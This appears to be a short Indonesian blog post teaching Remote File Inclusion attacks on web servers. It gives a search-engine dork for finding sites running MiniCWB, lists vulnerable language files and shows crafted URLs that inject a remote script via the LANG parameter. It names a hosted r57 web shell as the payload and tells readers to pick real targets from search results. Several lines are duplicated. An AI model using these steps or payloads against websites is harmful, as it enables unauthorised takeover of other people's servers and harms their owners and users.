terima kasih teman2 ku yg mau berkunjung ke blog aq
saya akan menjelaskan RFI, RFI adalah salah satu cara dalam penetrasi sebuah server melalui port 80
tanpa panjang lebar langsung praktek yah
contoh:
saya akan menjelaskan RFI, RFI adalah salah satu cara dalam penetrasi sebuah server melalui port 80
tanpa panjang lebar langsung praktek yah
contoh:
- Dork <==== adalah sebuah cara dalam mendapatkan target (artinya keyword yg kita
ketik di mesin pencari seperti google)
- Vulnerable file <==== adalah sebuah file dimana ada celah keamanan
contoh
Dork "Powered by MiniCWB"
Vulnerable file :
language/en.inc.php
language/hu.inc.php
language/no.inc.php
language/ro.inc.php
language/ru.inc.php
- dari data diatas kalian coba ketik digoogle ke dari dark tersebut
- maka akan banyak muncul web2 yang memiliki kelemahan dari file tersebut
- ambil web target yg diinginkan (copy linknya jgn diklik)
- edit link target yang diinginkan
http://localhost/[path]/language/en.inc.php?LANG=[evilc0de]
http://localhost/[path]/language/hu.inc.php?LANG=[evilc0de]
http://localhost/[path]/language/no.inc.php?LANG=[evilc0de]
http://localhost/[path]/language/ro.inc.php?LANG=[evilc0de]
http://localhost/[path]/language/ru.inc.php?LANG=[evilc0de]
http://localhost/[path]/language/hu.inc.php?LANG=[evilc0de]
http://localhost/[path]/language/no.inc.php?LANG=[evilc0de]
http://localhost/[path]/language/ro.inc.php?LANG=[evilc0de]
http://localhost/[path]/language/ru.inc.php?LANG=[evilc0de]
[evilc0de] adalah sebuah script yg disisipkan di web yg kita punya
contoh script g saya punya : http://geocities.com/anggri_yanto/r57.txt
-jgn lp diakhiri tanda tanya untuk agar dieksekusi
